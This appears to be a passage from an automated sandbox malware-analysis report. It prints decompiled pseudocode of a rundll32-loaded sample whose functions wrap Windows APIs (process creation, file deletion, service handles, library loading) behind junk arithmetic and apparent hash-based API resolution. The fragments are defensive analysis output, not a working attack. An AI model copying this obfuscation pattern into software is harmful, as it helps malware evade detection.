                                                                                                                      • Opcode ID: 43935c843aae4829611c0686b053fedb4fd8e6d3d3521d64be353873fdee31cf
                                                                                                                      • Instruction ID: db53446b367ed6946db1b02cabd9773bf1eb329d5435db39a8a5f378ffd0585e
                                                                                                                      • Opcode Fuzzy Hash: 43935c843aae4829611c0686b053fedb4fd8e6d3d3521d64be353873fdee31cf
                                                                                                                      • Instruction Fuzzy Hash: 22112576D01208FBDF10DFA4D946ACEBFB4EB14304F108089F9106A2A0DBB55B64AB81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0043E689 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36serviceCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 477 43e689-43e712 call 42cf25 call 422d9f CloseServiceHandle
                                                                                                                      C-Code - Quality: 73%
                                                                                                                      			E0043E689(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t27;
				int _t34;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0042CF25(_t27);
				_v8 = 0x8d6642;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 + 0x9ccb;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x0002819d;
				_v16 = 0x6a74c5;
				_v16 = _v16 | 0x354c93f6;
				_v16 = _v16 ^ 0x356d05ed;
				_v12 = 0xe812c4;
				_v12 = _v12 * 0x26;
				_v12 = _v12 ^ 0x227e2d65;
				E00422D9F(0x23833043, 0x1ec, __ecx, 0x1b74c9e2);
				_t34 = CloseServiceHandle(_a8); // executed
				return _t34;
			}








                                                                                                                      0x0043e68f
                                                                                                                      0x0043e692
                                                                                                                      0x0043e695
                                                                                                                      0x0043e699
                                                                                                                      0x0043e69a
                                                                                                                      0x0043e69f
                                                                                                                      0x0043e6a9
                                                                                                                      0x0043e6ad
                                                                                                                      0x0043e6b4
                                                                                                                      0x0043e6b8
                                                                                                                      0x0043e6bf
                                                                                                                      0x0043e6c6
                                                                                                                      0x0043e6cd
                                                                                                                      0x0043e6d4
                                                                                                                      0x0043e6ef
                                                                                                                      0x0043e6f2
                                                                                                                      0x0043e702
                                                                                                                      0x0043e70d
                                                                                                                      0x0043e712

                                                                                                                      APIs
                                                                                                                      • CloseServiceHandle.ADVAPI32(356D05ED), ref: 0043E70D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleService
                                                                                                                      • String ID: e-~"
                                                                                                                      • API String ID: 1725840886-2046105602
                                                                                                                      • Opcode ID: c1046b7ecd956da74b7a5d1762cebc86866113f0b369af2bd128aca44436a943
                                                                                                                      • Instruction ID: 1d7daff24281a6045cd3539cca2e7fb8c544dbab1e90b788b4391d62e068a948
                                                                                                                      • Opcode Fuzzy Hash: c1046b7ecd956da74b7a5d1762cebc86866113f0b369af2bd128aca44436a943
                                                                                                                      • Instruction Fuzzy Hash: AA01E271C0020CFBCB08EFA4D98689EBFB4EB54304F608189E928A6251D7B5AB649F50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00434DAD Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 52COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 482 434dad-434e63 call 42cf25 call 422d9f CloseHandle
                                                                                                                      C-Code - Quality: 72%
                                                                                                                      			E00434DAD(void* __ecx, void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				void* _v28;
				intOrPtr _v32;
				void* _t41;
				int _t50;
				signed int _t52;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0042CF25(_t41);
				_v32 = 0xb76b6b;
				asm("stosd");
				asm("stosd");
				_t52 = 0x74;
				asm("stosd");
				_v16 = 0xdf8814;
				_v16 = _v16 | 0xf44f2943;
				_v16 = _v16 << 6;
				_v16 = _v16 >> 5;
				_v16 = _v16 ^ 0x01b79e59;
				_v12 = 0x5a8921;
				_v12 = _v12 / _t52;
				_v12 = _v12 << 0xd;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 ^ 0x000807b1;
				_v8 = 0x5c56e6;
				_v8 = _v8 ^ 0x7431396c;
				_v8 = _v8 + 0xffff5a5b;
				_v8 = _v8 + 0x50a9;
				_v8 = _v8 ^ 0x74635491;
				E00422D9F(0x25d2a026, 0x1b9, _t52, 0xa62ab78c);
				_t50 = CloseHandle(_a4); // executed
				return _t50;
			}











                                                                                                                      0x00434db4
                                                                                                                      0x00434db7
                                                                                                                      0x00434dba
                                                                                                                      0x00434dbf
                                                                                                                      0x00434dc4
                                                                                                                      0x00434dd3
                                                                                                                      0x00434dd8
                                                                                                                      0x00434dd9
                                                                                                                      0x00434de0
                                                                                                                      0x00434de1
                                                                                                                      0x00434de8
                                                                                                                      0x00434def
                                                                                                                      0x00434df3
                                                                                                                      0x00434df7
                                                                                                                      0x00434dfe
                                                                                                                      0x00434e0f
                                                                                                                      0x00434e12
                                                                                                                      0x00434e16
                                                                                                                      0x00434e1a
                                                                                                                      0x00434e21
                                                                                                                      0x00434e28
                                                                                                                      0x00434e2f
                                                                                                                      0x00434e36
                                                                                                                      0x00434e3d
                                                                                                                      0x00434e52
                                                                                                                      0x00434e5d
                                                                                                                      0x00434e63

                                                                                                                      APIs
                                                                                                                      • CloseHandle.KERNEL32(000807B1,?,?,?,?,?,?,?,?,?), ref: 00434E5D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandle
                                                                                                                      • String ID: l91t
                                                                                                                      • API String ID: 2962429428-3929799471
                                                                                                                      • Opcode ID: 8da09b77d3d2241b99642312c43de4b26fc02d46d5695bad48a0b92c4f965d63
                                                                                                                      • Instruction ID: 6132880a53d56380c5d9db2d72fcc5478463acf8ad225598c49edda6a0f1d8ab
                                                                                                                      • Opcode Fuzzy Hash: 8da09b77d3d2241b99642312c43de4b26fc02d46d5695bad48a0b92c4f965d63
                                                                                                                      • Instruction Fuzzy Hash: B9113476D0060CFFDB05DFE5D84A89EBBB0EB40314F50C088E914A6255D7B99B588F42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0043679C Relevance: 1.6, APIs: 1, Instructions: 65processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 39%
                                                                                                                      			E0043679C(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, struct _STARTUPINFOW* _a36, intOrPtr _a40, intOrPtr _a48, WCHAR* _a60, int _a64) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				intOrPtr _v24;
				void* _t40;
				int _t46;
				WCHAR* _t50;

				_push(_a64);
				_t50 = __ecx;
				_push(_a60);
				_push(0);
				_push(0);
				_push(_a48);
				_push(0);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0042CF25(_t40);
				_v24 = 0x639852;
				_v20 = 0;
				_v12 = 0x9647c4;
				_v12 = _v12 + 0x4343;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 ^ 0x0009af77;
				_v16 = 0x17e0ca;
				_v16 = _v16 >> 4;
				_v16 = _v16 ^ 0x000f0fb4;
				_v8 = 0x429f7b;
				_v8 = _v8 + 0xffff27c2;
				_v8 = _v8 + 0xb08b;
				_v8 = _v8 ^ 0x004b6691;
				E00422D9F(0xb8601dc2, 0x1c8, __ecx, 0xa62ab78c);
				_t46 = CreateProcessW(_a60, _t50, 0, 0, _a64, 0, 0, 0, _a36, _a4); // executed
				return _t46;
			}











                                                                                                                      0x004367a4
                                                                                                                      0x004367a9
                                                                                                                      0x004367ab
                                                                                                                      0x004367ae
                                                                                                                      0x004367af
                                                                                                                      0x004367b0
                                                                                                                      0x004367b3
                                                                                                                      0x004367b4
                                                                                                                      0x004367b7
                                                                                                                      0x004367ba
                                                                                                                      0x004367bb
                                                                                                                      0x004367be
                                                                                                                      0x004367c1
                                                                                                                      0x004367c4
                                                                                                                      0x004367c7
                                                                                                                      0x004367c8
                                                                                                                      0x004367cb
                                                                                                                      0x004367cf
                                                                                                                      0x004367d0
                                                                                                                      0x004367d5
                                                                                                                      0x004367df
                                                                                                                      0x004367e2
                                                                                                                      0x004367e9
                                                                                                                      0x004367f0
                                                                                                                      0x004367f4
                                                                                                                      0x004367fb
                                                                                                                      0x00436802
                                                                                                                      0x00436806
                                                                                                                      0x0043680d
                                                                                                                      0x00436814
                                                                                                                      0x0043681b
                                                                                                                      0x00436822
                                                                                                                      0x00436842
                                                                                                                      0x0043685c
                                                                                                                      0x00436863

                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNEL32(?,00D9A4AC,00000000,00000000,?,00000000,00000000,00000000,?,0009AF77), ref: 0043685C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction ID: dcec278cf53e0ceaf0e5164fa6802d2fce67f535b5bd9b4918f5922bacddd0eb
                                                                                                                      • Opcode Fuzzy Hash: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction Fuzzy Hash: 9921E87290024CBBCF119F96CD09CDFBFB9EF99714F008149FA1466160D7B68A64EBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0043E938 Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 48%
                                                                                                                      			E0043E938(long __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, long _a36, WCHAR* _a40) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				void* _t34;
				void* _t41;
				long _t45;
				long _t46;

				_push(_a40);
				_t45 = __edx;
				_push(_a36);
				_t46 = __ecx;
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0042CF25(_t34);
				_v16 = 0x974c12;
				_v16 = _v16 * 0x75;
				_v16 = _v16 ^ 0x4529a886;
				_v12 = 0x89ee90;
				_v12 = _v12 >> 3;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 ^ 0x0001fd6b;
				_v8 = 0x2afb1;
				_v8 = _v8 + 0xffff660b;
				_v8 = _v8 | 0x1aac0731;
				_v8 = _v8 ^ 0x1aae47e7;
				E00422D9F(0xb361a139, 0x20d, __ecx, 0xa62ab78c);
				_t41 = CreateFileW(_a40, _t45, _a36, 0, _a12, _t46, 0); // executed
				return _t41;
			}










                                                                                                                      0x0043e941
                                                                                                                      0x0043e946
                                                                                                                      0x0043e948
                                                                                                                      0x0043e94b
                                                                                                                      0x0043e94d
                                                                                                                      0x0043e950
                                                                                                                      0x0043e951
                                                                                                                      0x0043e954
                                                                                                                      0x0043e957
                                                                                                                      0x0043e958
                                                                                                                      0x0043e95b
                                                                                                                      0x0043e95e
                                                                                                                      0x0043e961
                                                                                                                      0x0043e962
                                                                                                                      0x0043e963
                                                                                                                      0x0043e968
                                                                                                                      0x0043e97c
                                                                                                                      0x0043e97f
                                                                                                                      0x0043e986
                                                                                                                      0x0043e98d
                                                                                                                      0x0043e991
                                                                                                                      0x0043e995
                                                                                                                      0x0043e99c
                                                                                                                      0x0043e9a3
                                                                                                                      0x0043e9aa
                                                                                                                      0x0043e9b1
                                                                                                                      0x0043e9cb
                                                                                                                      0x0043e9e0
                                                                                                                      0x0043e9e8

                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000), ref: 0043E9E0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 360c415e9015d3d13679f61f4bfb391b888432a2a898910ac906551ddd5173d2
                                                                                                                      • Instruction ID: ef67e6dccb28940afb23841a3ad3bdbf5fd8fdf783ec0b8419776163acf2de8e
                                                                                                                      • Opcode Fuzzy Hash: 360c415e9015d3d13679f61f4bfb391b888432a2a898910ac906551ddd5173d2
                                                                                                                      • Instruction Fuzzy Hash: A411447690120CBFCF059ED5DC86CDEBFB9EB48358F108098F924A2210D2768A20DF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00427A47 Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 71%
                                                                                                                      			E00427A47(long __ecx, void* __edx, intOrPtr _a4, void* _a8, long _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				void* _t37;
				void* _t45;
				long _t48;

				_push(_a20);
				_t48 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0042CF25(_t37);
				_v20 = _v20 & 0x00000000;
				_v24 = 0xfcacd9;
				_v8 = 0xc1635f;
				_v8 = _v8 >> 7;
				_v8 = _v8 * 0x50;
				_v8 = _v8 * 0x36;
				_v8 = _v8 ^ 0x197e1637;
				_v16 = 0x23fde3;
				_v16 = _v16 << 0xf;
				_v16 = _v16 + 0x8916;
				_v16 = _v16 ^ 0xfef173e1;
				_v12 = 0xdffc87;
				_v12 = _v12 | 0x0f84fa40;
				_v12 = _v12 ^ 0x35513bb9;
				_v12 = _v12 ^ 0x3a8da81e;
				E00422D9F(0x9afcb52f, 0x1c3, __ecx, 0xa62ab78c);
				_t45 = RtlAllocateHeap(_a8, _t48, _a12); // executed
				return _t45;
			}











                                                                                                                      0x00427a4e
                                                                                                                      0x00427a51
                                                                                                                      0x00427a53
                                                                                                                      0x00427a56
                                                                                                                      0x00427a59
                                                                                                                      0x00427a5c
                                                                                                                      0x00427a60
                                                                                                                      0x00427a61
                                                                                                                      0x00427a66
                                                                                                                      0x00427a6d
                                                                                                                      0x00427a74
                                                                                                                      0x00427a7b
                                                                                                                      0x00427a93
                                                                                                                      0x00427a9a
                                                                                                                      0x00427a9d
                                                                                                                      0x00427aa4
                                                                                                                      0x00427aab
                                                                                                                      0x00427aaf
                                                                                                                      0x00427ab6
                                                                                                                      0x00427abd
                                                                                                                      0x00427ac4
                                                                                                                      0x00427acb
                                                                                                                      0x00427ad2
                                                                                                                      0x00427ae2
                                                                                                                      0x00427af1
                                                                                                                      0x00427af7

                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(FEF173E1,00989527,00000000,?,?,?,?,?,?,?,?,?,?,003C356D), ref: 00427AF1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 0f32b3375919fc0ccfdf2406b6b0c1b31f8184e837ed22a30a99afc3922f126c
                                                                                                                      • Instruction ID: 8a0033142576b5769e8f4a4e3ecf0f27635884cdf9f4636da00cc4f7bad2f8f8
                                                                                                                      • Opcode Fuzzy Hash: 0f32b3375919fc0ccfdf2406b6b0c1b31f8184e837ed22a30a99afc3922f126c
                                                                                                                      • Instruction Fuzzy Hash: 7B11E2B2C0121CFBDF05DF95DA4A8EEBBB4EB14304F14C099E9116A251D7B15B24AF51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00422E96 Relevance: 1.5, APIs: 1, Instructions: 42serviceCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 67%
                                                                                                                      			E00422E96(void* __ecx, void* __edx, intOrPtr _a4, int _a8, intOrPtr _a12, short* _a16, void* _a20) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				void* _t35;
				void* _t42;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0042CF25(_t35);
				_v16 = 0xae7ad3;
				_v16 = _v16 >> 6;
				_v16 = _v16 >> 9;
				_v16 = _v16 ^ 0x000b5401;
				_v12 = 0xf75da6;
				_v12 = _v12 >> 7;
				_v12 = _v12 + 0xa35c;
				_v12 = _v12 ^ 0x00021a7e;
				_v8 = 0xb7fdd7;
				_v8 = _v8 * 0x34;
				_v8 = _v8 >> 7;
				_v8 = _v8 | 0x8cd68937;
				_v8 = _v8 ^ 0x8cd3b3e5;
				E00422D9F(0x53eee54a, 0xc3, __ecx, 0x1b74c9e2);
				_t42 = OpenServiceW(_a20, _a16, _a8); // executed
				return _t42;
			}








                                                                                                                      0x00422e9c
                                                                                                                      0x00422e9f
                                                                                                                      0x00422ea2
                                                                                                                      0x00422ea5
                                                                                                                      0x00422ea8
                                                                                                                      0x00422eac
                                                                                                                      0x00422ead
                                                                                                                      0x00422eb2
                                                                                                                      0x00422ebc
                                                                                                                      0x00422ec0
                                                                                                                      0x00422ec4
                                                                                                                      0x00422ecb
                                                                                                                      0x00422ed2
                                                                                                                      0x00422ed6
                                                                                                                      0x00422edd
                                                                                                                      0x00422ee4
                                                                                                                      0x00422eff
                                                                                                                      0x00422f02
                                                                                                                      0x00422f06
                                                                                                                      0x00422f0d
                                                                                                                      0x00422f1d
                                                                                                                      0x00422f2e
                                                                                                                      0x00422f33

                                                                                                                      APIs
                                                                                                                      • OpenServiceW.ADVAPI32(?,?,000B5401), ref: 00422F2E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: OpenService
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3098006287-0
                                                                                                                      • Opcode ID: 1a010bb4209eebcabefe83886664eafcedc3f71cda4b3a4488a61dc91c7b4f8b
                                                                                                                      • Instruction ID: 2bc3f13ef541f475a14062be399deda5aa4887bd2a8b7d95882793f74ea42439
                                                                                                                      • Opcode Fuzzy Hash: 1a010bb4209eebcabefe83886664eafcedc3f71cda4b3a4488a61dc91c7b4f8b
                                                                                                                      • Instruction Fuzzy Hash: 7011CE72D0121CFBCF05DFE4D94A88DBBB1EB14308F20C099F915A6261E3769B64AF41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0042BAB0 Relevance: 1.5, APIs: 1, Instructions: 40fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E0042BAB0(WCHAR* __ecx, void* __edx, intOrPtr _a4) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t30;
				int _t37;
				WCHAR* _t40;

				_push(_a4);
				_t40 = __ecx;
				_push(__ecx);
				E0042CF25(_t30);
				_v12 = 0xf8a4b;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0xa9327f6f;
				_v12 = _v12 ^ 0x26166746;
				_v12 = _v12 ^ 0x8f266abd;
				_v16 = 0xc512b4;
				_v16 = _v16 ^ 0xa05564f8;
				_v16 = _v16 | 0x9f0a4514;
				_v16 = _v16 ^ 0xbf9c633f;
				_v8 = 0x850486;
				_v8 = _v8 * 0x26;
				_v8 = _v8 + 0xffff9e70;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x00077990;
				E00422D9F(0x7bb5ca56, 0xa2, __ecx, 0xa62ab78c);
				_t37 = DeleteFileW(_t40); // executed
				return _t37;
			}









                                                                                                                      0x0042bab7
                                                                                                                      0x0042baba
                                                                                                                      0x0042babd
                                                                                                                      0x0042babe
                                                                                                                      0x0042bac3
                                                                                                                      0x0042bacd
                                                                                                                      0x0042bad1
                                                                                                                      0x0042bad8
                                                                                                                      0x0042badf
                                                                                                                      0x0042bae6
                                                                                                                      0x0042baed
                                                                                                                      0x0042baf4
                                                                                                                      0x0042bafb
                                                                                                                      0x0042bb02
                                                                                                                      0x0042bb1d
                                                                                                                      0x0042bb20
                                                                                                                      0x0042bb27
                                                                                                                      0x0042bb2b
                                                                                                                      0x0042bb3b
                                                                                                                      0x0042bb44
                                                                                                                      0x0042bb4a

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4033686569-0
                                                                                                                      • Opcode ID: 142492e115de819e337085e0760341fc4d7c13ea390934f1e7f80fc7c158108e
                                                                                                                      • Instruction ID: 831d266f3dd318c67631377d205fc38affd236e0c3628ecd4fb17a4fa6c9a49e
                                                                                                                      • Opcode Fuzzy Hash: 142492e115de819e337085e0760341fc4d7c13ea390934f1e7f80fc7c158108e
                                                                                                                      • Instruction Fuzzy Hash: 0F010574D01218BBDB54EFA5C98A4DEBFB4EF00304F20C189E825AA211D7B41B45DF96
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 004407D7 Relevance: 1.5, APIs: 1, Instructions: 40libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 86%
                                                                                                                      			E004407D7(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t30;
				struct HINSTANCE__* _t39;
				signed int _t41;

				_push(_a8);
				_push(_a4);
				E0042CF25(_t30);
				_v12 = 0x89457d;
				_v12 = _v12 ^ 0x6b886c65;
				_v12 = _v12 | 0xf6315bef;
				_v12 = _v12 ^ 0xff319cd3;
				_v8 = 0xe31a0f;
				_t41 = 0xa;
				_v8 = _v8 * 0x1b;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0xfe799add;
				_v16 = 0x93f3d7;
				_v16 = _v16 / _t41;
				_v16 = _v16 ^ 0x00076e75;
				E00422D9F(0xe1be5824, 0x1e6, _t41, 0xa62ab78c);
				_t39 = LoadLibraryW(_a4); // executed
				return _t39;
			}









                                                                                                                      0x004407dd
                                                                                                                      0x004407e0
                                                                                                                      0x004407e5
                                                                                                                      0x004407ea
                                                                                                                      0x004407f4
                                                                                                                      0x004407fd
                                                                                                                      0x00440804
                                                                                                                      0x0044080b
                                                                                                                      0x00440818
                                                                                                                      0x0044081f
                                                                                                                      0x00440822
                                                                                                                      0x00440826
                                                                                                                      0x0044082d
                                                                                                                      0x0044083e
                                                                                                                      0x00440841
                                                                                                                      0x00440856
                                                                                                                      0x00440861
                                                                                                                      0x00440866

                                                                                                                      APIs
                                                                                                                      • LoadLibraryW.KERNEL32(FF319CD3), ref: 00440861
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1029625771-0
                                                                                                                      • Opcode ID: b5a7ff1cf00df94c7e0cce40bb031e72467efb4d89ba6605bf6ea92949dc313d
                                                                                                                      • Instruction ID: 4ebf51cba1d7718c506d25234c901299a2f7bda2c993fa3b9f1131ce921fbb43
                                                                                                                      • Opcode Fuzzy Hash: b5a7ff1cf00df94c7e0cce40bb031e72467efb4d89ba6605bf6ea92949dc313d
                                                                                                                      • Instruction Fuzzy Hash: 9D012275D0520CFFCB08EFE4D98A98EBFB1EB40304F60C099E915AB261E7B55B549B44
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0043E2C5 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 81%
                                                                                                                      			E0043E2C5(void* __ecx, void* __edx, intOrPtr _a4, struct _SHFILEOPSTRUCTW* _a8) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				void* _t30;
				int _t37;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0042CF25(_t30);
				_v16 = 0x8c64b0;
				_v16 = _v16 + 0x962b;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x000da62a;
				_v12 = 0xb02c29;
				_v12 = _v12 * 0x73;
				_v12 = _v12 + 0xffff997c;
				_v12 = _v12 ^ 0x4f272bd9;
				_v8 = 0x94952e;
				_v8 = _v8 + 0xa237;
				_v8 = _v8 ^ 0xcd764018;
				_v8 = _v8 + 0x8874;
				_v8 = _v8 ^ 0xcdeaa0fe;
				E00422D9F(0x2326b427, 0x2d, __ecx, 0xe4d0349b);
				_t37 = SHFileOperationW(_a8); // executed
				return _t37;
			}








                                                                                                                      0x0043e2cb
                                                                                                                      0x0043e2ce
                                                                                                                      0x0043e2d2
                                                                                                                      0x0043e2d3
                                                                                                                      0x0043e2d8
                                                                                                                      0x0043e2e2
                                                                                                                      0x0043e2e9
                                                                                                                      0x0043e2ed
